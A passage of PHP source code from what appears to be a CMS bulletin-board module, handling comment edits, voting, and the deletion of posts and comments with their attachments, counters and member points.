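                    $results->message = $this->getLanguage('error/notFound');
                } elseif ($this->checkPermission('ment_modify') == false && ($ment->midx != 0 && $ment->midx != $this->IM->getModule('member')->getLogged())) {
                    $results->success = false;
                    $results->message = $this->getLanguage('error/forbidden');
                } elseif ($ment->midx == 0) {
                    // NOTE(review): unlike postWrite, the guest password is required here even
                    // for holders of ment_modify; kept as written - confirm that is intended.
                    if ($mHash->password_validate($values->password, $ment->password) == false) {
                        $results->success = false;
                        $results->errors = array('password' => $this->getLanguage('error/incorrectPassword'));
                        $results->message = $this->getLanguage('error/incorrectPassword');
                    }
                }

                if ($results->success == true) {
                    if ($this->IM->getModule('member')->isLogged() == false) {
                        $insert['name'] = $values->name;
                        $insert['password'] = $values->password ? $mHash->password_hash($values->password) : '';
                        $insert['email'] = $values->email;
                        $insert['ip'] = $_SERVER['REMOTE_ADDR'];
                    }
                    $insert['modify_date'] = time();

                    $this->db()->update($this->table->ment, $insert)->where('idx', $ment->idx)->execute();

                    if ($ment->midx != 0 && $ment->midx != $this->IM->getModule('member')->getLogged()) {
                        $this->IM->getModule('push')->sendPush($ment->midx, 'board', 'ment_modify', $values->idx, array('from' => $values->name));
                    }

                    if ($this->IM->getModule('member')->isLogged() == true) {
                        $this->IM->getModule('member')->addActivity(null, 0, 'board', 'ment_modify', array('idx' => $values->idx));
                    }
                }
            }

            if ($results->success == true) {
                for ($i = 0, $loop = count($values->attachments); $i < $loop; $i++) {
                    if ($this->db()->select($this->table->attachment)->where('idx', $values->attachments[$i])->count() == 0) {
                        $this->db()->insert($this->table->attachment, array('idx' => $values->attachments[$i], 'bid' => $values->post->bid, 'type' => 'MENT', 'parent' => $values->idx))->execute();
                    }
                    $this->IM->getModule('attachment')->filePublish($values->attachments[$i]);
                }

                // Refresh the comment counter and last-comment time of the post.
                $lastMent = $this->db()->select($this->table->ment)->where('parent', $values->parent)->where('is_delete', 'FALSE')->orderBy('reg_date', 'desc')->get();
                $mentnum = count($lastMent);
                $lastMentTime = $mentnum > 0 ? $lastMent[0]->reg_date : $values->post->reg_date;
                $this->db()->update($this->table->post, array('ment' => $mentnum, 'last_ment' => $lastMentTime))->where('idx', $values->parent)->execute();

                // Secret posts are kept out of the site-wide article index.
                if ($values->post->is_secret != 'TRUE') {
                    $this->IM->setArticle('board', $values->post->bid, 'ment', $values->idx, time());
                    $this->IM->setArticle('board', $values->post->bid, 'post', $values->post->idx, time());
                }

                $results->message = $this->getLanguage('mentWrite/success');
                $results->idx = $values->idx;
                $results->parent = $values->parent;
                $results->page = $this->getMentPosition($values->idx);
            }
        } elseif (count($values->errors) > 0) {
            $results->success = false;
            $results->message = $this->getLanguage('error/required');
            $results->errors = $values->errors;
        }
    }

    if ($action == 'mentDelete') {
        // Returns the confirmation modal only; the removal itself is the 'delete' action.
        $values->idx = Request('idx');

        $ment = $this->getMent($values->idx);
        if ($ment == null) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notFound');
        } elseif ($this->checkPermission('ment_delete') == true || $ment->midx == 0 || $ment->midx == $this->IM->getModule('member')->getLogged()) {
            $results->success = true;
            $results->modalHtml = $this->getDelete('ment', $values->idx);
        } else {
            $results->success = false;
            $results->message = $this->getLanguage('error/forbidden');
        }
    }

    if ($action == 'vote') {
        // type and vote are used below as a table-property name and a column name, so both
        // are matched strictly against a fixed list and fall back to a safe default.
        $values->type = in_array(Request('type'), array('post', 'ment'), true) == true ? Request('type') : 'post';
        $values->idx = Request('idx');
        $values->vote = in_array(Request('vote'), array('good', 'bad'), true) == true ? Request('vote') : 'good';

        $values->article = $this->getArticle($values->type, $values->idx);
        // The board is only needed once the article is known to exist.
        $values->board = $values->article == null ? null : $this->getBoard($values->article->bid);

        if ($this->IM->getModule('member')->isLogged() == false) {
            $results->success = false;
            $results->message = $this->getLanguage('error/notLogged');
        } else {
            $article = $this->db()->select($this->table->{$values->type})->where('idx', $values->idx)->getOne();

            if ($article == null) {
                $results->success = false;
                $results->message = $this->getLanguage('error/notFound');
            } elseif ($article->midx == $this->IM->getModule('member')->getLogged()) {
                // Members cannot vote on their own article.
                $results->success = false;
                $results->message = $this->getLanguage('vote/mypost');
            } else {
                // One vote per member and article. History rows are written with an
                // upper-cased type, so the lookup uses the same form; with a case-sensitive
                // collation the lower-case lookup would never match and allow repeat votes.
                $check = $this->db()->select($this->table->history)->where('type', strtoupper($values->type))->where('parent', $values->idx)->where('action', 'VOTE')->where('midx', $this->IM->getModule('member')->getLogged())->getOne();

                if ($check == null) {
                    $this->db()->update($this->table->{$values->type}, array($values->vote => $this->db()->inc()))->where('idx', $values->idx)->execute();
                    $this->db()->insert($this->table->history, array('type' => strtoupper($values->type), 'parent' => $values->idx, 'action' => 'VOTE', 'midx' => $this->IM->getModule('member')->getLogged(), 'result' => strtoupper($values->vote), 'reg_date' => time()))->execute();

                    $results->success = true;
                    $results->message = $this->getLanguage('vote/' . $values->vote);
                    $results->liveUpdate = 'liveUpdateBoard' . ucfirst($values->type) . ucfirst($values->vote) . $values->idx;
                    // New counter value: the count read before the increment, plus one.
                    // (The previous code added 1 to the string 'good'/'bad'.)
                    $results->liveValue = number_format($article->{$values->vote} + 1);

                    if ($this->IM->getModule('member')->isLogged() == true) {
                        $this->IM->getModule('member')->sendPoint(null, $values->board->vote_point, 'board', $values->type . '_' . $values->vote, array('idx' => $values->idx));
                        $this->IM->getModule('member')->addActivity(null, $values->board->vote_exp, 'board', $values->type . '_' . $values->vote, array('idx' => $values->idx));
                    }

                    if ($article->midx != 0) {
                        $this->IM->getModule('push')->sendPush($article->midx, 'board', $values->type . '_' . $values->vote, $article->idx, array('from' => $this->IM->getModule('member')->getLogged()));
                    }
                } else {
                    $results->success = false;
                    $results->message = $this->getLanguage('vote/duplicated');
                    $results->result = $check->result;
                }
            }
        }
    }

    if ($action == 'delete') {
        $values->idx = Request('idx');
        $values->type = Request('type');

        if ($values->type == 'post') {
            $post = $this->getPost($values->idx);
            // The board is looked up only for an existing post (it used to be read from a
            // possibly null $post before the not-found check).
            $values->board = $post == null ? null : $this->getBoard($post->bid);

            if ($post == null) {
                $results->success = false;
                $results->message = $this->getLanguage('error/notFound');
            } elseif ($this->checkPermission('post_delete') == true || $post->midx != 0 && $post->midx == $this->IM->getModule('member')->getLogged()) {
                $results->success = true;
            } elseif ($post->midx == 0) {
                // Guest post: deletion requires the password stored with it.
                $values->password = Request('password');
                $mHash = new Hash();
                if ($mHash->password_validate($values->password, $post->password) == true) {
                    $results->success = true;
                } else {
                    $results->success = false;
                    $results->errors = array('password' => $this->getLanguage('error/incorrectPassword'));
                }
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('error/forbidden');
            }

            if ($results->success == true) {
                $this->db()->delete($this->table->post)->where('idx', $post->idx)->execute();

                // Files attached to the post.
                $attachments = $this->db()->select($this->table->attachment)->where('parent', $post->idx)->where('type', 'POST')->get();
                for ($i = 0, $loop = count($attachments); $i < $loop; $i++) {
                    $attachments[$i] = $attachments[$i]->idx;
                }
                $this->IM->getModule('attachment')->fileDelete($attachments);

                // Comments of the post, their thread rows and their files.
                $ments = $this->db()->select($this->table->ment)->where('parent', $post->idx)->get();
                for ($i = 0, $loop = count($ments); $i < $loop; $i++) {
                    $this->db()->delete($this->table->ment)->where('idx', $ments[$i]->idx)->execute();
                    $this->db()->delete($this->table->ment_depth)->where('idx', $ments[$i]->idx)->execute();

                    $attachments = $this->db()->select($this->table->attachment)->where('parent', $ments[$i]->idx)->where('type', 'MENT')->get();
                    for ($j = 0, $loopj = count($attachments); $j < $loopj; $j++) {
                        $attachments[$j] = $attachments[$j]->idx;
                    }
                    $this->IM->getModule('attachment')->fileDelete($attachments);
                }

                if ($post->category != 0) {
                    $lastPost = $this->db()->select($this->table->post)->where('category', $post->category)->orderBy('reg_date', 'desc')->get();
                    $postnum = count($lastPost);
                    $lastPostTime = $postnum > 0 ? $lastPost[0]->reg_date : 0;
                    $this->db()->update($this->table->category, array('postnum' => $postnum, 'last_post' => $lastPostTime))->where('idx', $post->category)->execute();
                }

                if ($post->midx != 0) {
                    // Take back the points granted for the post.
                    $this->IM->getModule('member')->sendPoint($post->midx, $values->board->post_point * -1, 'board', 'post_delete', array('title' => $post->title), true);
                    if ($post->midx == $this->IM->getModule('member')->getLogged()) {
                        $this->IM->getModule('member')->addActivity($post->midx, 0, 'board', 'post_delete', array('title' => $post->title));
                    } else {
                        $this->IM->getModule('push')->sendPush($post->midx, 'board', 'post_delete', $values->idx, array('title' => $post->title));
                    }
                }

                $this->IM->deleteArticle('board', 'post', $values->idx);
            }
        } elseif ($values->type == 'ment') {
            $ment = $this->getMent($values->idx);
            // Post and board are looked up only when the comment exists.
            $post = $ment == null ? null : $this->getPost($ment->parent);
            $values->board = $post == null ? null : $this->getBoard($post->bid);

            if ($ment == null) {
                $results->success = false;
                $results->message = $this->getLanguage('error/notFound');
            } elseif ($this->checkPermission('ment_delete') == true || $ment->midx != 0 && $ment->midx == $this->IM->getModule('member')->getLogged()) {
                $results->success = true;
            } elseif ($ment->midx == 0) {
                // Guest comment: deletion requires the password stored with it.
                $values->password = Request('password');
                $mHash = new Hash();
                if ($mHash->password_validate($values->password, $ment->password) == true) {
                    $results->success = true;
                } else {
                    $results->success = false;
                    $results->errors = array('password' => $this->getLanguage('error/incorrectPassword'));
                }
            } else {
                $results->success = false;
                $results->message = $this->getLanguage('error/forbidden');
            }

            if ($results->success == true) {
                if ($this->checkMentTree($values->idx) == false) {
                    // checkMentTree() returned false: remove the row and its thread entry.
                    $this->db()->delete($this->table->ment)->where('idx', $values->idx)->execute();
                    $this->db()->delete($this->table->ment_depth)->where('idx', $values->idx)->execute();

                    // Then clear ancestors that were only soft-deleted, as long as
                    // checkMentTree() is false for them as well.
                    if ($ment->source != 0) {
                        $source = $this->getMent($ment->source);
                        while ($source->is_delete == 'TRUE') {
                            if ($this->checkMentTree($source->idx) == false) {
                                $this->db()->delete($this->table->ment)->where('idx', $source->idx)->execute();
                                $this->db()->delete($this->table->ment_depth)->where('idx', $source->idx)->execute();

                                if ($source->source != 0) {
                                    $source = $this->getMent($source->source);
                                } else {
                                    break;
                                }
                            } else {
                                break;
                            }
                        }
                    }
                    $results->position = null;
                } else {
                    // Otherwise keep the row as an emptied, soft-deleted placeholder.
                    $results->position = $values->idx;
                    $this->db()->update($this->table->ment, array('is_delete' => 'TRUE', 'modify_date' => time(), 'content' => '', 'search' => ''))->where('idx', $ment->idx)->execute();
                }

                $attachments = $this->db()->select($this->table->attachment)->where('parent', $ment->idx)->where('type', 'MENT')->get();
                for ($i = 0, $loop = count($attachments); $i < $loop; $i++) {
                    $attachments[$i] = $attachments[$i]->idx;
                }
                $this->IM->getModule('attachment')->fileDelete($attachments);

                $lastMent = $this->db()->select($this->table->ment)->where('parent', $ment->parent)->where('is_delete', 'FALSE')->orderBy('reg_date', 'desc')->get();
                if (count($lastMent) == 0) {
                    $this->db()->update($this->table->post, array('ment' => 0, 'last_ment' => $post->reg_date))->where('idx', $ment->parent)->execute();
                    $results->parent = $ment->parent;
                } else {
                    if ($results->position == null) {
                        // Position the view on the closest preceding comment, if there is one.
                        $position = $this->db()->select($this->table->ment_depth)->where('parent', $ment->parent)->where('head', $ment->head, '<=')->where('arrange', $ment->arrange, '<')->orderBy('head', 'asc')->orderBy('arrange', 'asc')->get();
                        $lastPosition = array_pop($position);
                        $results->position = $lastPosition == null ? null : $lastPosition->idx;
                    }
                    $this->db()->update($this->table->post, array('ment' => count($lastMent), 'last_ment' => $lastMent[0]->reg_date))->where('idx', $ment->parent)->execute();
                }

                if ($ment->midx != 0) {
                    // Take back the points granted for the comment.
                    $this->IM->getModule('member')->sendPoint($ment->midx, $values->board->ment_point * -1, 'board', 'ment_delete', array('title' => $post->title), true);
                    if ($ment->midx == $this->IM->getModule('member')->getLogged()) {
                        $this->IM->getModule('member')->addActivity($ment->midx, 0, 'board', 'ment_delete', array('title' => $post->title));
                    } else {
                        $this->IM->getModule('push')->sendPush($ment->midx, 'board', 'ment_delete', $values->idx, array('title' => $post->title));
                    }
                }

                $this->IM->deleteArticle('board', 'ment', $values->idx);
                $results->message = $this->getLanguage('mentDelete/success');
            }
        }

        $results->type = $values->type;
    }

    $this->IM->fireEvent('afterDoProcess', 'board', $action, $values, $results);

    return $results;
}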